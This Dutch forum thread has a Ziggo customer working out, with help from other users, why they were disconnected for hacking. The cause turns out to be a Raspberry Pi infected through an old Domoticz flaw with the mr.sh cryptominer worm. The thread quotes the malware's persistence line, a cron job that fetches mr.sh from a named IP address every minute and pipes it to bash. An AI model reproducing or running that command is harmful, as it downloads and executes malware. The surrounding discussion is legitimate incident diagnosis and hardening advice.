Afgesloten vanwege hacken

TdW

Forum Gebruiker
Berichten
4
Internet
  1. Ziggo
Digitale TV
  1. Ziggo
Ik was dus ook afgesloten omdat er vanaf mijn IP hackpogingen zouden zijn ondernomen. Na een paar keer overleg via mail met 'team abuse' heb ik alleen nog een paar androids en een windows pc in mijn netwerk. En het netwerk onzichtbaar gemaakt, wachtwoord veranderd en alle portforwarding uitgeschakeld. Ik ben aan het afwachten of het zich nog eens zal herhalen. Zoniet dan heb ik in ieder geval een aanknopingspunt om verder te zoeken.
 
Laatst bewerkt:
Dit lees je zeker vaker. En inderdaad moet je het met weinig info doen.
Aan de andere kant.. hoeveel info heeft het abuse team over jouw netwerk? Ze kunnen immers niet in jouw devices en logs kijken.

In eerste instantie verdenk ik de raspberry.
Had je die raspberry zo opengezet, dat je er van buiten af bij kon komen?
Afhankelijk van wat je had draaien, ssh of een webserver, kan het zijn dat daar op in is gelogd en misbruik is gemaakt van het device.
Heb je na het sluiten van de poort de raspberry ook helemaal opnieuw geinstalleerd? Anders blijft de malware actief.

Hier een soort gelijk verhaal:
 
Hallo René,
Bedankt voor het meedenken. Dit was de reactie van Ziggo:

De oorzaak van dit probleem kan in elke apparaat zitten wat op het internet zit aangesloten, dit kan bijvoorbeeld ook een NAS-server, IP camera, Domotica Systeem, Rasp Berry PI ect zijn, heeft u gecontroleerd wat er bij u thuis allemaal op het internet zit aangesloten want er moet toch een oorzaak van dit probleem achterhaalt worden.
tja...

De raspberry had 3 poorten geforward, 22, 80 en 10000.
Ik had ssh, apache en domoticz erop draaien. De poorten staan inmiddels allemaal dicht en de raspberry hangt niet meer aan het netwerk. De incidenten (totaal 4) vonden telkens plaats op maandag, met twee weken ertussen. Telkens twee incidenten maar op niet dezelfde tijd.

Dus, behalve dat het beide keren op maandag was, geen systeem in te ontdekken. Ik ga nu afwachten, als maandag over een week niets gebeurt dan moet ik wel concluderen dat het de rpi is. Ik ga die dan vervangen met een rpi zero met nieuw OS. Geen poorten naar buiten meer open.

Op het internet is overigens niets te vinden over dit soort kwetsbaarheden op de rpi. Alleen als je 22 open hebt staan en het originele wachtwoord voor gebruiker pi niet hebt veranderd. Die open deur had ik niet.
Nu maar een weekje afwachten.........
 
Laatst bewerkt:
Je schrijft de raspberry had 3 poorten geforward, maar dat is natuurlijk niet waar. Op het modem of router had je 3 poorten geforward (open gezet en verwezen naar) de raspberry pi. Het is helemaal niet erg dat jij een rpi hebt draaien maar waarom ga je 3 poorten open zetten, Moet je er perse vanaf een andere locatie bij?

En je iets gaat open zetten moet je zorgen dat alles goed beveiligd is: fail2ban, firewall, patches, fatsoenlijke wachtwoorden etc,

Als er daadwerkelijk gehackt is vanaf jou IP is het denk ik verstandig om die Rpi geheel opnieuw van software te voorzien en maar hopen dat er niks anders in de netwerk is "aangestoken"
 
Je kunt nogal wat redenen bedenken om poorten open te zetten tbv je RPI, een bekend voorbeeld is Domoticz. Je wil immers je verwarming vast aan kunnen zetten als je op weg naar huis bent haha. En zo zijn er wel meer "nice to have" toepassingen, een ip camera, etc.

Natuurlijk betekent iedere openstaande poort een risico. Dus zolang het niet perse hoeft... niet openzetten zou ik zeggen. SSH? niet doen, en al helemaal niet op poort 22.

Enfin, het is nog allerminst duidelijk dat die RPI de oorzaak is. Ik ben benieuwd of er iemand zich zal melden die het weet. Als het een virus is zal je niet de enige zijn lijkt mij. En dan moet er toch op het internet wel iets over te vinden zijn. Ik hoop dat je ons van de ontwikkelingen op de hoogte zal houden, kan bijzonder leerzaam zijn.
 
Het wordt voor hackers steeds interessanter zich op andere apparatuur dan ps's te richten. Synology bemerkte vorige maand een sterk verhoogde activiteit in aanvallen op hun nas systemen. Ze hebben daarover meldingen gemaakt op hun webpagina en mails verstuurd. Deze groep richtte zich op meerdere merken nassen.

Eerder dit jaar was er een probleem met Domoticz. Er zat een bekende bug in hun webpagina waardoor aanvallers die de webpagina konden zien, ook eigen code op de Domoticz konden zetten. In de link gaat het om een cryptominer, maar dat lek is op andere plaatsen ook voor andere mallware gebruikt. In dit geval was de rpi misschien wel veilig, maar niet de erop geïnstalleerde software, die teveel rechten kreeg.

Poorten open zetten blijft risicovol. Vooral als de erachter liggende systemen slechte beveiligingen hebben. Gelukkig zijn er veel apparaten die geen poort open zetten, maar de dienst via een externe server laten lopen. Het voordeel is dat dit veiliger is qua open poorten. Het nadeel is dat als de dienst stopt, het apparaat onbruikbaar wordt.
 
Ik heb intussen tijd gevonden om die raspberry eens aan de tand te voelen. Het ding met een usb keyboard eraan aan de tv gehangen op een ander adres waar hij geen netwerkverbinding had.
Bij het inloggen kreeg ik meteen een hoop foutmeldingen:
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (file too short): ignored.
Iets dergelijks had ik nog nooit gezien maar het leek me niet koosjer. Uit verdere naspeuringen blijkt dit inderdaad met een worm te maken te hebben. Ik vond in de cron een wget opdracht om op een bepaald ip een script te downloaden (mr.sh) en wel iedere minuut.
* * * * * wget://107.173.102.59/mr.sh||wget -q -0 - https://107.173.102.59/mr.sh)bash -sh
Dus er is in ieder geval sprake van een besmetting.
Nog niet duidelijk is wat deze worm precies doet en of die de hackpogingen veroorzaakt. Maar ik heb in ieder geval een aanwijzing in welke richting ik het moet zoeken.
 
Dat "mr.sh" script is inderdaad de cryptominer die in mijn vorige link naar Domoticz genoemd wordt. Verderop in dat topic staan volgens mij ook goede instructies om de besmetting te verwijderen. Er wordt daar ook hetzelfde IP adres gebruikt als wat jij ziet. mr.sh kan ook naar andere IP adressen wijzen.

Het cryptominer deel van de mallware zelf valt geen andere apparaten aan, maar ik neem aan dat dit script ook probeert andere apparaten te besmetten, wat Ziggo nu opgemerkt heeft.

Met de zoektermen "mr.sh", "Sustes" en/of "monero" vind je nog meer info over deze mallware. Ook op het Synology forum is veel geschreven over deze mallware. Voor anderen: Zorg dat je de laatste versie van Domiticz gebruikt, want de oudere versies zijn heel gevoelig voor deze besmetting.
 
Laatst bewerkt:
Inmiddels zijn we een "kritisch" tijdstip gepasseerd (de incidenten vonden telkens plaats op maandag) en geen moeilijkheden meer ondervonden. Het is dus aannemelijk dat het virus/worm/malware/ransomware whatever in de raspberry de boosdoener is. Deze is inmiddels van een nieuw besturingssysteem voorzien. Met zelfs een virusscanner erop. Er worden geen poorten meer opengezet op de router dus zouden er geen problemen meer kunnen ontstaan.
Ik hoop dat dit iemand kan helpen die soortgelijke problemen heeft.
Aan degenen die gereageerd hebben: Bedankt voor het meedenken.
 
Meestal zet je poorten open in een router voor inkomend verkeer.
Voor uitgaand verkeer is blokkeren bij de standaard Ziggo modems volgens mij niet mogelijk.
 
Terug
Bovenaan